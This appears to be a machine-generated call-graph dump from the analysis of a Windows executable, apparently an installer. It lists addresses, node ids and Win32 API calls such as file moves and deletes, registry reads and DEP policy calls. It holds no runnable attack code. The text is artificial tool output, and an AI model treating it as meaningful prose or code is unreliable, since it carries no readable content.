57734 4213e6 57731->57734 57753 421e2c 25 API calls 57731->57753 57732->57731 57736 4213ce SetMenu 57732->57736 57733->57731 57740 4213a9 57733->57740 57754 4211bc 24 API calls 57734->57754 57736->57731 57738->57731 57744 421360 GetMenu 57738->57744 57739 4213ed 57739->57724 57749 4221e8 10 API calls 57739->57749 57743 4213b2 SetMenu 57740->57743 57741->57727 57750 408d2c 33 API calls 57741->57750 57743->57731 57745 421383 57744->57745 57746 42136a 57744->57746 57752 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 57745->57752 57748 42137d SetMenu 57746->57748 57748->57745 57749->57724 57750->57741 57751->57730 57752->57731 57753->57734 57754->57739 53393 480441 53398 451004 53393->53398 53395 480455 53408 47f4f0 53395->53408 53397 480479 53399 451011 53398->53399 53401 451065 53399->53401 53414 408c0c 18 API calls 53399->53414 53402 450e88 InterlockedExchange 53401->53402 53403 451077 53402->53403 53405 45108d 53403->53405 53415 408c0c 18 API calls 53403->53415 53406 4510d0 53405->53406 53416 408c0c 18 API calls 53405->53416 53406->53395 53417 40b3c8 53408->53417 53410 47f55d 53410->53397 53411 4069dc 18 API calls 53412 47f512 53411->53412 53412->53410 53412->53411 53421 4764b4 53412->53421 53414->53401 53415->53405 53416->53406 53418 40b3d3 53417->53418 53419 40b3f3 53418->53419 53437 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53418->53437 53419->53412 53433 47652e 53421->53433 53434 4764e5 53421->53434 53422 476579 53438 451294 53422->53438 53423 451294 35 API calls 53423->53434 53425 451294 35 API calls 53425->53433 53426 476590 53428 403420 4 API calls 53426->53428 53427 4038a4 18 API calls 53427->53434 53430 4765aa 53428->53430 53429 4038a4 18 API calls 53429->53433 53430->53412 53431 403744 18 API calls 53431->53434 53432 403450 18 API calls 53432->53434 53433->53422 53433->53425 53433->53429 53435 403450 18 API calls 53433->53435 53436 403744 18 API calls 53433->53436 53434->53423 53434->53427 53434->53431 53434->53432 53434->53433 53435->53433 53436->53433 53437->53419 53439 4512a4 53438->53439 53440 4512af 53438->53440 53439->53426 53444 451238 35 API calls 53440->53444 53442 4512ba 53442->53439 53445 408c0c 18 API calls 53442->53445 53444->53442 53445->53439 57755 44b4a8 57756 44b4b6 57755->57756 57758 44b4d5 57755->57758 57757 44b38c 25 API calls 57756->57757 57756->57758 57757->57758 57759 448728 57760 448756 57759->57760 57761 44875d 57759->57761 57764 403400 4 API calls 57760->57764 57762 448771 57761->57762 57765 44852c 21 API calls 57761->57765 57762->57760 57763 403494 4 API calls 57762->57763 57766 44878a 57763->57766 57767 448907 57764->57767 57765->57762 57768 4037b8 18 API calls 57766->57768 57769 4487a6 57768->57769 57770 4037b8 18 API calls 57769->57770 57771 4487c2 57770->57771 57771->57760 57772 4487d6 57771->57772 57773 4037b8 18 API calls 57772->57773 57774 4487f0 57773->57774 57775 431bd0 18 API calls 57774->57775 57776 448812 57775->57776 57777 431ca0 18 API calls 57776->57777 57778 448832 57776->57778 57777->57776 57781 448870 57778->57781 57802 4435d0 18 API calls 57778->57802 57785 448888 57781->57785 57803 4435d0 18 API calls 57781->57803 57782 4488bc GetLastError 57804 4484c0 18 API calls 57782->57804 57791 442334 57785->57791 57786 4488cb 57805 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57786->57805 57788 4488e0 57806 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57788->57806 57790 4488e8 57792 443312 57791->57792 57793 44236d 57791->57793 57795 403400 4 API calls 57792->57795 57794 403400 4 API calls 57793->57794 57796 442375 57794->57796 57797 443327 57795->57797 57798 431bd0 18 API calls 57796->57798 57797->57782 57800 442381 57798->57800 57799 443302 57799->57782 57800->57799 57807 441a0c 18 API calls 57800->57807 57802->57778 57803->57785 57804->57786 57805->57788 57806->57790 57807->57800 57808 4165ec DestroyWindow 57809 4915e4 57810 49161e 57809->57810 57811 49162a 57810->57811 57812 491620 57810->57812 57814 491639 57811->57814 57815 491662 57811->57815 58005 409098 MessageBeep 57812->58005 57817 446ff8 32 API calls 57814->57817 57820 49169a 57815->57820 57821 491671 57815->57821 57816 403420 4 API calls 57818 491c76 57816->57818 57819 491646 57817->57819 57822 403400 4 API calls 57818->57822 57823 406bb0 18 API calls 57819->57823 57830 4916a9 57820->57830 57831 4916d2 57820->57831 57824 446ff8 32 API calls 57821->57824 57825 491c7e 57822->57825 57826 491651 57823->57826 57827 49167e 57824->57827 58006 44734c 19 API calls 57826->58006 58007 406c00 18 API calls 57827->58007 57833 446ff8 32 API calls 57830->57833 57836 4916fa 57831->57836 57837 4916e1 57831->57837 57832 491689 58008 44734c 19 API calls 57832->58008 57835 4916b6 57833->57835 58009 406c34 18 API calls 57835->58009 57844 491709 57836->57844 57845 49172e 57836->57845 58011 407280 19 API calls 57837->58011 57840 4916c1 58010 44734c 19 API calls 57840->58010 57842 4916e9 58012 44734c 19 API calls 57842->58012 57847 446ff8 32 API calls 57844->57847 57850 49173d 57845->57850 57851 491766 57845->57851 57846 491625 57846->57816 57848 491716 57847->57848 57849 4072a8 SetCurrentDirectoryA 57848->57849 57852 49171e 57849->57852 57853 446ff8 32 API calls 57850->57853 57856 49179e 57851->57856 57857 491775 57851->57857 58013 4470d0 19 API calls 57852->58013 57855 49174a 57853->57855 57858 42c804 19 API calls 57855->57858 57864 4917ea 57856->57864 57865 4917ad 57856->57865 57859 446ff8 32 API calls 57857->57859 57860 491755 57858->57860 57861 491782 57859->57861 58014 44734c 19 API calls 57860->58014 58015 4071f8 22 API calls 57861->58015 57870 4917f9 57864->57870 57871 491822 57864->57871 57867 446ff8 32 API calls 57865->57867 57866 49178d 58016 44734c 19 API calls 57866->58016 57869 4917bc 57867->57869 57872 446ff8 32 API calls 57869->57872 57873 446ff8 32 API calls 57870->57873 57877 49185a 57871->57877 57878 491831 57871->57878 57874 4917cd 57872->57874 57876 491806 57873->57876 58017 4912e8 22 API calls 57874->58017 57880 42c8a4 19 API calls 57876->57880 57887 491869 57877->57887 57888 491892 57877->57888 57881 446ff8 32 API calls 57878->57881 57879 4917d9 58018 44734c 19 API calls 57879->58018 57883 491811 57880->57883 57884 49183e 57881->57884 58019 44734c 19 API calls 57883->58019 57886 42c8cc 19 API calls 57884->57886 57889 491849 57886->57889 57890 446ff8 32 API calls 57887->57890 57893 4918ca 57888->57893 57894 4918a1 57888->57894 58020 44734c 19 API calls 57889->58020 57892 491876 57890->57892 58021 42c8fc 19 API calls 57892->58021 57901 4918d9 57893->57901 57902 491902 57893->57902 57896 446ff8 32 API calls 57894->57896 57899 4918ae 57896->57899 57897 491881 58022 44734c 19 API calls 57897->58022 57900 42c92c 19 API calls 57899->57900 57904 4918b9 57900->57904 57903 446ff8 32 API calls 57901->57903 57908 49194e 57902->57908 57909 491911 57902->57909 57905 4918e6 57903->57905 58023 44734c 19 API calls 57904->58023 57907 42c954 19 API calls 57905->57907 57910 4918f1 57907->57910 57914 49195d 57908->57914 57915 4919a0 57908->57915 57911 446ff8 32 API calls 57909->57911 58024 44734c 19 API calls 57910->58024 57913 491920 57911->57913 57916 446ff8 32 API calls 57913->57916 57917 446ff8 32 API calls 57914->57917 57921 4919af 57915->57921 57922 491a13 57915->57922 57918 491931 57916->57918 57919 491970 57917->57919 58025 42c4f8 19 API calls 57918->58025 57923 446ff8 32 API calls 57919->57923 57926 446ff8 32 API calls 57921->57926 57930 491a52 57922->57930 57931 491a22 57922->57931 57927 491981 57923->57927 57924 49193d 58026 44734c 19 API calls 57924->58026 57928 4919bc 57926->57928 58027 4914e0 26 API calls 57927->58027 57997 42c608 21 API calls 57928->57997 57942 491a91 57930->57942 57943 491a61 57930->57943 57934 446ff8 32 API calls 57931->57934 57933 49198f 58028 44734c 19 API calls 57933->58028 57937 491a2f 57934->57937 57935 4919ca 57938 4919ce 57935->57938 57939 491a03 57935->57939 58031 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 57937->58031 57941 446ff8 32 API calls 57938->57941 58030 4470d0 19 API calls 57939->58030 57946 4919dd 57941->57946 57952 491ad0 57942->57952 57953 491aa0 57942->57953 57947 446ff8 32 API calls 57943->57947 57945 491a3c 58032 4470d0 19 API calls 57945->58032 57998 452c80 57946->57998 57950 491a6e 57947->57950 57951 452770 5 API calls 57950->57951 57956 491a7b 57951->57956 57961 491b18 57952->57961 57962 491adf 57952->57962 57957 446ff8 32 API calls 57953->57957 57954 491a4d 57954->57846 57955 4919ed 58029 4470d0 19 API calls 57955->58029 58033 4470d0 19 API calls 57956->58033 57960 491aad 57957->57960 58034 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 57960->58034 57969 491b60 57961->57969 57970 491b27 57961->57970 57964 446ff8 32 API calls 57962->57964 57966 491aee 57964->57966 57965 491aba 58035 4470d0 19 API calls 57965->58035 57968 446ff8 32 API calls 57966->57968 57971 491aff 57968->57971 57975 491b73 57969->57975 57981 491c29 57969->57981 57972 446ff8 32 API calls 57970->57972 57977 447278 19 API calls 57971->57977 57973 491b36 57972->57973 57974 446ff8 32 API calls 57973->57974 57976 491b47 57974->57976 57978 446ff8 32 API calls 57975->57978 57982 447278 19 API calls 57976->57982 57977->57846 57979 491ba0 57978->57979 57980 446ff8 32 API calls 57979->57980 57983 491bb7 57980->57983 57981->57846 58039 446f9c 32 API calls 57981->58039 57982->57846 58036 407ddc 21 API calls 57983->58036 57985 491c42 57986 42e8c8 19 API calls 57985->57986 57987 491c4a 57986->57987 58040 44734c 19 API calls 57987->58040 57990 491bd9 57991 446ff8 32 API calls 57990->57991 57992 491bed 57991->57992 58037 408508 18 API calls 57992->58037 57994 491bf8 58038 44734c 19 API calls 57994->58038 57996 491c04 57997->57935 57999 452724 2 API calls 57998->57999 58001 452c99 57999->58001 58000 452c9d 58000->57955 58001->58000 58002 452cc1 MoveFileA GetLastError 58001->58002 58003 452760 Wow64RevertWow64FsRedirection 58002->58003 58004 452ce7 58003->58004 58004->57955 58005->57846 58006->57846 58007->57832 58008->57846 58009->57840 58010->57846 58011->57842 58012->57846 58013->57846 58014->57846 58015->57866 58016->57846 58017->57879 58018->57846 58019->57846 58020->57846 58021->57897 58022->57846 58023->57846 58024->57846 58025->57924 58026->57846 58027->57933 58028->57846 58029->57846 58030->57846 58031->57945 58032->57954 58033->57846 58034->57965 58035->57846 58036->57990 58037->57994 58038->57996 58039->57985 58040->57846 58041 42e3ef SetErrorMode 53446 441394 53447 44139d 53446->53447 53448 4413ab WriteFile 53446->53448 53447->53448 53449 4413b6 53448->53449 53450 416410 53451 416422 53450->53451 53452 416462 GetClassInfoA 53451->53452 53470 408d2c 33 API calls 53451->53470 53453 41648e 53452->53453 53455 4164b0 RegisterClassA 53453->53455 53456 4164a0 UnregisterClassA 53453->53456 53458 4164ee 53453->53458 53457 4164d8 53455->53457 53455->53458 53456->53455 53460 408cbc 19 API calls 53457->53460 53461 416517 53458->53461 53462 4164e9 53458->53462 53459 41645d 53459->53452 53460->53462 53471 407544 53461->53471 53462->53458 53463 408cbc 19 API calls 53462->53463 53463->53461 53467 416530 53468 41a1e8 19 API calls 53467->53468 53469 41653a 53468->53469 53470->53459 53472 407552 53471->53472 53473 407548 53471->53473 53475 418384 7 API calls 53472->53475 53474 402660 4 API calls 53473->53474 53474->53472 53475->53467 53476 498718 53534 403344 53476->53534 53478 498726 53537 4056a0 53478->53537 53480 49872b 53540 40631c GetModuleHandleA GetProcAddress 53480->53540 53484 498735 53548 40994c 53484->53548 53815 4032fc 53534->53815 53536 403349 GetModuleHandleA GetCommandLineA 53536->53478 53539 4056db 53537->53539 53816 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53537->53816 53539->53480 53541 406338 53540->53541 53542 40633f GetProcAddress 53540->53542 53541->53542 53543 406355 GetProcAddress 53542->53543 53544 40634e 53542->53544 53545 406364 SetProcessDEPPolicy 53543->53545 53546 406368 53543->53546 53544->53543 53545->53546 53547 4063c4 6F541CD0 53546->53547 53547->53484 53817 409024 53548->53817 53815->53536 53816->53539 53818 408cbc 19 API calls 53817->53818 53819 409035 53818->53819 53820 4085dc GetSystemDefaultLCID 53819->53820 53821 408612 53820->53821 53822 403450 18 API calls 53821->53822 53823 406dec 19 API calls 53821->53823 53824 408568 19 API calls 53821->53824 53827 408674 53821->53827 53822->53821 53823->53821 53824->53821 53825 406dec 19 API calls 53825->53827 53826 408568 19 API calls 53826->53827 53827->53825 53827->53826 53828 403450 18 API calls 53827->53828 53829 4086f7 53827->53829 53828->53827 53830 403420 4 API calls 53829->53830 53831 408711 53830->53831 53832 408720 GetSystemDefaultLCID 53831->53832 53889 408568 GetLocaleInfoA 53832->53889 53835 403450 18 API calls 53836 408760 53835->53836 53837 408568 19 API calls 53836->53837 53838 408775 53837->53838 53839 408568 19 API calls 53838->53839 53840 408799 53839->53840 53895 4085b4 GetLocaleInfoA 53840->53895 53843 4085b4 GetLocaleInfoA 53844 4087c9 53843->53844 53845 408568 19 API calls 53844->53845 53846 4087e3 53845->53846 53847 4085b4 GetLocaleInfoA 53846->53847 53848 408800 53847->53848 53849 408568 19 API calls 53848->53849 53850 40881a 53849->53850 53851 403450 18 API calls 53850->53851 53890 4085a1 53889->53890 53891 40858f 53889->53891 53893 403494 4 API calls 53890->53893 53892 4034e0 18 API calls 53891->53892 53894 40859f 53892->53894 53893->53894 53894->53835 53896 4085d0 53895->53896 53896->53843 55266 4804db 55267 4804e4 55266->55267 55268 48050f 55266->55268 55267->55268 55269 480501 55267->55269 55272 48054e 55268->55272 55640 47ef88 18 API calls 55268->55640 55638 476770 203 API calls 55269->55638 55271 480572 55279 4805ae 55271->55279 55280 480590 55271->55280 55272->55271 55275 480565 55272->55275 55276 480567 55272->55276 55274 480541 55641 47eff0 56 API calls 55274->55641 55283 47efcc 56 API calls 55275->55283 55642 47f060 56 API calls 55276->55642 55277 480506 55277->55268 55639 408be0 19 API calls 55277->55639 55645 47ee20 38 API calls 55279->55645 55284 4805a5 55280->55284 55643 47eff0 56 API calls 55280->55643 55283->55271 55644 47ee20 38 API calls 55284->55644 55288 4805ac 55289 4805be 55288->55289 55290 4805c4 55288->55290 55291 4805c2 55289->55291 55294 47efcc 56 API calls 55289->55294 55290->55291 55292 47efcc 56 API calls 55290->55292 55392 47c15c 55291->55392 55292->55291 55294->55291 55295 4805eb 55393 42d898 GetWindowsDirectoryA 55392->55393 55394 47c180 55393->55394 55395 403450 18 API calls 55394->55395 55396 47c18d 55395->55396 55397 42d8c4 GetSystemDirectoryA 55396->55397 55398 47c195 55397->55398 55399 403450 18 API calls 55398->55399 55400 47c1a2 55399->55400 55401 42d8f0 6 API calls 55400->55401 55402 47c1aa 55401->55402 55403 403450 18 API calls 55402->55403 55404 47c1b7 55403->55404 55405 47c1c0 55404->55405 55406 47c1dc 55404->55406 55677 42d208 55405->55677 55408 403400 4 API calls 55406->55408 55410 47c1da 55408->55410 55412 47c221 55410->55412 55413 42c8cc 19 API calls 55410->55413 55411 403450 18 API calls 55411->55410 55657 47bfe4 55412->55657 55415 47c1fc 55413->55415 55417 403450 18 API calls 55415->55417 55419 47c209 55417->55419 55418 403450 18 API calls 55420 47c23d 55418->55420 55419->55412 55422 403450 18 API calls 55419->55422 55421 47c25b 55420->55421 55423 4035c0 18 API calls 55420->55423 55424 47bfe4 22 API calls 55421->55424 55422->55412 55423->55421 55425 47c26a 55424->55425 55426 403450 18 API calls 55425->55426 55427 47c277 55426->55427 55428 47c29f 55427->55428 55429 42c3fc 19 API calls 55427->55429 55430 47c306 55428->55430 55433 47bfe4 22 API calls 55428->55433 55431 47c28d 55429->55431 55432 47c3ce 55430->55432 55437 47c326 SHGetKnownFolderPath 55430->55437 55436 4035c0 18 API calls 55431->55436 55434 47c3d7 55432->55434 55435 47c3f8 55432->55435 55438 47c2b7 55433->55438 55439 42c3fc 19 API calls 55434->55439 55440 42c3fc 19 API calls 55435->55440 55436->55428 55441 47c340 55437->55441 55442 47c37b SHGetKnownFolderPath 55437->55442 55443 403450 18 API calls 55438->55443 55444 47c3e4 55439->55444 55445 47c405 55440->55445 55687 403ba4 21 API calls 55441->55687 55442->55432 55447 47c395 55442->55447 55452 47c2c4 55443->55452 55448 4035c0 18 API calls 55444->55448 55449 4035c0 18 API calls 55445->55449 55688 403ba4 21 API calls 55447->55688 55450 47c35b CoTaskMemFree 55450->55295 55451 47c2d7 55452->55451 55685 453344 18 API calls 55452->55685 55456 47c3b0 CoTaskMemFree 55456->55295 55638->55277 55640->55274 55641->55272 55642->55271 55643->55284 55644->55288 55645->55288 55658 42de1c RegOpenKeyExA 55657->55658 55659 47c00a 55658->55659 55660 47c030 55659->55660 55661 47c00e 55659->55661 55663 403400 4 API calls 55660->55663 55662 42dd4c 20 API calls 55661->55662 55664 47c01a 55662->55664 55665 47c037 55663->55665 55666 47c025 RegCloseKey 55664->55666 55667 403400 4 API calls 55664->55667 55665->55418 55666->55665 55667->55666 55678 4038a4 18 API calls 55677->55678 55679 42d21b 55678->55679 55680 42d232 GetEnvironmentVariableA 55679->55680 55684 42d245 55679->55684 55689 42dbd0 18 API calls 55679->55689 55680->55679 55681 42d23e 55680->55681 55683 403400 4 API calls 55681->55683 55683->55684 55684->55411 55685->55451 55687->55450 55688->55456 55689->55679 58042 40cc34 58045 406f10 WriteFile 58042->58045 58046 406f2d 58045->58046 57159 41ee54 57160 41ee63 IsWindowVisible 57159->57160 57161 41ee99 57159->57161 57160->57161 57162 41ee6d IsWindowEnabled 57160->57162 57162->57161 57163 41ee77 57162->57163 57164 402648 18 API calls 57163->57164 57165 41ee81 EnableWindow 57164->57165 57165->57161 57166 41fb58 57167 41fb61 57166->57167 57170 41fdfc 57167->57170 57169 41fb6e 57171 41feee 57170->57171 57172 41fe13 57170->57172 57171->57169 57172->57171 57191 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 57172->57191 57174 41fe49 57175 41fe73 57174->57175 57176 41fe4d 57174->57176 57201 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 57175->57201 57192 41fb9c 57176->57192 57180 41fe81 57182 41fe85 57180->57182 57183 41feab 57180->57183 57181 41fb9c 10 API calls 57185 41fe71 57181->57185 57186 41fb9c 10 API calls 57182->57186 57184 41fb9c 10 API calls 57183->57184 57187 41febd 57184->57187 57185->57169 57188 41fe97 57186->57188 57189 41fb9c 10 API calls 57187->57189 57190 41fb9c 10 API calls 57188->57190 57189->57185 57190->57185 57191->57174 57193 41fbb7 57192->57193 57194 41fbcd 57193->57194 57195 41f93c 4 API calls 57193->57195 57202 41f93c 57194->57202 57195->57194 57197 41fc15 57198 41fc38 SetScrollInfo 57197->57198 57210 41fa9c 57198->57210 57201->57180 57203 4181e0 57202->57203 57204 41f959 GetWindowLongA 57203->57204 57205 41f996 57204->57205 57206 41f976 57204->57206 57222 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 57205->57222 57221 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 57206->57221 57209 41f982 57209->57197 57211 41faaa 57210->57211 57212 41fab2 57210->57212 57211->57181 57213 41faef 57212->57213 57214 41faf1 57212->57214 57215 41fae1 57212->57215 57217 41fb31 GetScrollPos 57213->57217 57224 417e48 IsWindowVisible ScrollWindow SetWindowPos 57214->57224 57223 417e48 IsWindowVisible ScrollWindow SetWindowPos 57215->57223 57217->57211 57219 41fb3c 57217->57219 57220 41fb4b SetScrollPos 57219->57220 57220->57211 57221->57209 57222->57209 57223->57213 57224->57213 57225 420598 57226 4205ab 57225->57226 57246 415b30 57226->57246 57228 4206f2 57229 420709 57228->57229 57253 4146d4 KiUserCallbackDispatcher 57228->57253 57233 420720 57229->57233 57254 414718 KiUserCallbackDispatcher 57229->57254 57230 420651 57251 420848 34 API calls 57230->57251 57231 4205e6 57231->57228 57231->57230 57239 420642 MulDiv 57231->57239 57236 420742 57233->57236 57255 420060 12 API calls 57233->57255 57237 42066a 57237->57228 57252 420060 12 API calls 57237->57252 57250 41a304 19 API calls 57239->57250 57242 420687 57243 4206a3 MulDiv 57242->57243 57244 4206c6 57242->57244 57243->57244 57244->57228 57245 4206cf MulDiv 57244->57245 57245->57228 57247 415b42 57246->57247 57256 414470 57247->57256 57249 415b5a 57249->57231 57250->57230 57251->57237 57252->57242 57253->57229 57254->57233 57255->57236 57257 41448a 57256->57257 57260 410458 57257->57260 57259 4144a0 57259->57249 57263 40dca4 57260->57263 57262 41045e 57262->57259 57264 40dd06 57263->57264 57265 40dcb7 57263->57265 57270 40dd14 57264->57270 57268 40dd14 33 API calls 57265->57268 57269 40dce1 57268->57269 57269->57262 57271 40dd24 57270->57271 57273 40dd3a 57271->57273 57282 40e09c 57271->57282 57298 40d5e0 57271->57298 57301 40df4c 57273->57301 57276 40dd42 57277 40d5e0 19 API calls 57276->57277 57278 40ddae 57276->57278 57304 40db60 57276->57304 57277->57276 57280 40df4c 19 API calls 57278->57280 57281 40dd10 57280->57281 57281->57262 57283 40e96c 19 API calls 57282->57283 57284 40e0d7 57283->57284 57285 403778 18 API calls 57284->57285 57286 40e18d 57284->57286 57372 40d774 19 API calls 57284->57372 57373 40e080 19 API calls 57284->57373 57285->57284 57287 40e1b7 57286->57287 57288 40e1a8 57286->57288 57369 40ba24 57287->57369 57318 40e3c0 57288->57318 57294 40e1b5 57295 403400 4 API calls 57294->57295 57296 40e25c 57295->57296 57296->57271 57299 40ea08 19 API calls 57298->57299 57300 40d5ea 57299->57300 57300->57271 57406 40d4bc 57301->57406 57305 40df54 19 API calls 57304->57305 57306 40db93 57305->57306 57307 40e96c 19 API calls 57306->57307 57308 40db9e 57307->57308 57309 40e96c 19 API calls 57308->57309 57310 40dba9 57309->57310 57311 40dbc4 57310->57311 57312 40dbbb 57310->57312 57317 40dbc1 57310->57317 57415 40d9d8 57311->57415 57418 40dac8 33 API calls 57312->57418 57315 403420 4 API calls 57316 40dc8f 57315->57316 57316->57276 57317->57315 57319 40e3f6 57318->57319 57320 40e3ec 57318->57320 57322 40e511 57319->57322 57323 40e495 57319->57323 57324 40e4f6 57319->57324 57325 40e576 57319->57325 57326 40e438 57319->57326 57327 40e4d9 57319->57327 57328 40e47a 57319->57328 57329 40e4bb 57319->57329 57340 40e45c 57319->57340 57375 40d440 19 API calls 57320->57375 57331 40d764 19 API calls 57322->57331 57383 40de24 19 API calls 57323->57383 57388 40e890 19 API calls 57324->57388 57335 40d764 19 API calls 57325->57335 57376 40d764 57326->57376 57386 40e9a8 19 API calls 57327->57386 57382 40d818 19 API calls 57328->57382 57385 40dde4 19 API calls 57329->57385 57341 40e519 57331->57341 57334 403400 4 API calls 57342 40e5eb 57334->57342 57343 40e57e 57335->57343 57339 40e4a0 57384 40d470 19 API calls 57339->57384 57340->57334 57347 40e523 57341->57347 57348 40e51d 57341->57348 57342->57294 57349 40e582 57343->57349 57350 40e59b 57343->57350 57344 40e4e4 57387 409d38 18 API calls 57344->57387 57389 40ea08 57347->57389 57357 40e521 57348->57357 57358 40e53c 57348->57358 57360 40ea08 19 API calls 57349->57360 57395 40de24 19 API calls 57350->57395 57352 40e461 57381 40ded8 19 API calls 57352->57381 57353 40e444 57379 40de24 19 API calls 57353->57379 57393 40de24 19 API calls 57357->57393 57362 40ea08 19 API calls 57358->57362 57360->57340 57361 40e44f 57380 40e26c 19 API calls 57361->57380 57363 40e544 57362->57363 57392 40d8a0 19 API calls 57363->57392 57366 40e566 57394 40e2d4 18 API calls 57366->57394 57401 40b9d0 57369->57401 57372->57284 57373->57284 57374 40d774 19 API calls 57374->57294 57375->57319 57377 40ea08 19 API calls 57376->57377 57378 40d76e 57377->57378 57378->57352 57378->57353 57379->57361 57380->57340 57381->57340 57382->57340 57383->57339 57384->57340 57385->57340 57386->57344 57387->57340 57388->57340 57396 40d780 57389->57396 57392->57340 57393->57366 57394->57340 57395->57340 57399 40d78b 57396->57399 57397 40d7c5 57397->57340 57399->57397 57400 40d7cc 19 API calls 57399->57400 57400->57399 57402 40b9e2 57401->57402 57404 40ba07 57401->57404 57402->57404 57405 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57402->57405 57404->57294 57404->57374 57405->57404 57407 40ea08 19 API calls 57406->57407 57408 40d4c9 57407->57408 57409 40d4dc 57408->57409 57413 40eb0c 19 API calls 57408->57413 57409->57276 57411 40d4d7 57414 40d458 19 API calls 57411->57414 57413->57411 57414->57409 57419 40ab7c 33 API calls 57415->57419 57417 40da00 57417->57317 57418->57317 57419->57417 58047 40ce7c 58048 40ce84 58047->58048 58049 40ceb2 58048->58049 58050 40cea7 58048->58050 58058 40ceae 58048->58058 58052 40ceb6 58049->58052 58053 40cec8 58049->58053 58060 406288 GlobalHandle GlobalUnlock GlobalFree 58050->58060 58059 40625c GlobalAlloc GlobalLock 58052->58059 58061 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 58053->58061 58056 40cec4 58057 408cbc 19 API calls 58056->58057 58056->58058 58057->58058 58059->58056 58060->58058 58061->58056 58062 41363c SetWindowLongA GetWindowLongA 58063 413699 SetPropA SetPropA 58062->58063 58064 41367b GetWindowLongA 58062->58064 58069 41f39c 58063->58069 58064->58063 58065 41368a SetWindowLongA 58064->58065 58065->58063 58074 415270 58069->58074 58081 423c0c 58069->58081 58175 423a84 58069->58175 58070 4136e9 58075 41527d 58074->58075 58076 4152e3 58075->58076 58077 4152d8 58075->58077 58079 4152e1 58075->58079 58182 424b8c 13 API calls 58076->58182 58077->58079 58183 41505c 60 API calls 58077->58183 58079->58070 58086 423c42 58081->58086 58084 423cec 58087 423cf3 58084->58087 58088 423d27 58084->58088 58085 423c8d 58089 423c93 58085->58089 58090 423d50 58085->58090 58109 423c63 58086->58109 58184 423b68 58086->58184 58091 423fb1 58087->58091 58092 423cf9 58087->58092 58095 423d32 58088->58095 58096 42409a IsIconic 58088->58096 58093 423cc5 58089->58093 58094 423c98 58089->58094 58097 423d62 58090->58097 58098 423d6b 58090->58098 58091->58109 58150 423fd7 IsWindowEnabled 58091->58150 58100 423f13 SendMessageA 58092->58100 58101 423d07 58092->58101 58093->58109 58125 423cde 58093->58125 58126 423e3f 58093->58126 58103 423df6 58094->58103 58104 423c9e 58094->58104 58105 4240d6 58095->58105 58106 423d3b 58095->58106 58102 4240ae GetFocus 58096->58102 58096->58109 58107 423d78 58097->58107 58108 423d69 58097->58108 58191 424194 11 API calls 58098->58191 58100->58109 58101->58109 58116 423cc0 58101->58116 58137 423f56 58101->58137 58102->58109 58111 4240bf 58102->58111 58196 423b84 NtdllDefWindowProc_A 58103->58196 58112 423ca7 58104->58112 58113 423e1e PostMessageA 58104->58113 58205 424850 WinHelpA PostMessageA 58105->58205 58106->58116 58117 4240ed 58106->58117 58110 4241dc 11 API calls 58107->58110 58192 423b84 NtdllDefWindowProc_A 58108->58192 58109->58070 58110->58109 58204 41eff4 GetCurrentThreadId EnumThreadWindows 58111->58204 58121 423cb0 58112->58121 58122 423ea5 58112->58122 58197 423b84 NtdllDefWindowProc_A 58113->58197 58116->58109 58190 423b84 NtdllDefWindowProc_A 58116->58190 58123 4240f6 58117->58123 58124 42410b 58117->58124 58129 423cb9 58121->58129 58130 423dce IsIconic 58121->58130 58131 423eae 58122->58131 58132 423edf 58122->58132 58133 4244d4 19 API calls 58123->58133 58206 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 58124->58206 58125->58116 58134 423e0b 58125->58134 58188 423b84 NtdllDefWindowProc_A 58126->58188 58128 4240c6 58128->58109 58138 4240ce SetFocus 58128->58138 58129->58116 58139 423d91 58129->58139 58142 423dea 58130->58142 58143 423dde 58130->58143 58199 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 58131->58199 58189 423b84 NtdllDefWindowProc_A 58132->58189 58133->58109 58146 424178 26 API calls 58134->58146 58136 423e45 58147 423e83 58136->58147 58148 423e61 58136->58148 58137->58109 58161 423f78 IsWindowEnabled 58137->58161 58138->58109 58139->58109 58193 422c4c ShowWindow PostMessageA PostQuitMessage 58139->58193 58141 423e39 58141->58109 58195 423b84 NtdllDefWindowProc_A 58142->58195 58194 423bc0 29 API calls 58143->58194 58146->58109 58155 423a84 6 API calls 58147->58155 58198 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 58148->58198 58149 423eb6 58157 423ec8 58149->58157 58163 41ef58 6 API calls 58149->58163 58150->58109 58158 423fe5 58150->58158 58153 423ee5 58159 423efd 58153->58159 58165 41eea4 2 API calls 58153->58165 58162 423e8b PostMessageA 58155->58162 58200 423b84 NtdllDefWindowProc_A 58157->58200 58168 423fec IsWindowVisible 58158->58168 58166 423a84 6 API calls 58159->58166 58160 423e69 PostMessageA 58160->58109 58161->58109 58167 423f86 58161->58167 58162->58109 58163->58157 58165->58159 58166->58109 58201 412310 21 API calls 58167->58201 58168->58109 58170 423ffa GetFocus 58168->58170 58171 4181e0 58170->58171 58172 42400f SetFocus 58171->58172 58202 415240 58172->58202 58176 423b0d 58175->58176 58177 423a94 58175->58177 58176->58070 58177->58176 58178 423a9a EnumWindows 58177->58178 58178->58176 58179 423ab6 GetWindow GetWindowLongA 58178->58179 58207 423a1c GetWindow 58178->58207 58180 423ad5 58179->58180 58180->58176 58181 423b01 SetWindowPos 58180->58181 58181->58176 58181->58180 58182->58079 58183->58079 58185 423b72 58184->58185 58186 423b7d 58184->58186 58185->58186 58187 408720 21 API calls 58185->58187 58186->58084 58186->58085 58187->58186 58188->58136 58189->58153 58190->58109 58191->58109 58192->58109 58193->58109 58194->58109 58195->58109 58196->58109 58197->58141 58198->58160 58199->58149 58200->58109 58201->58109 58203 41525b SetFocus 58202->58203 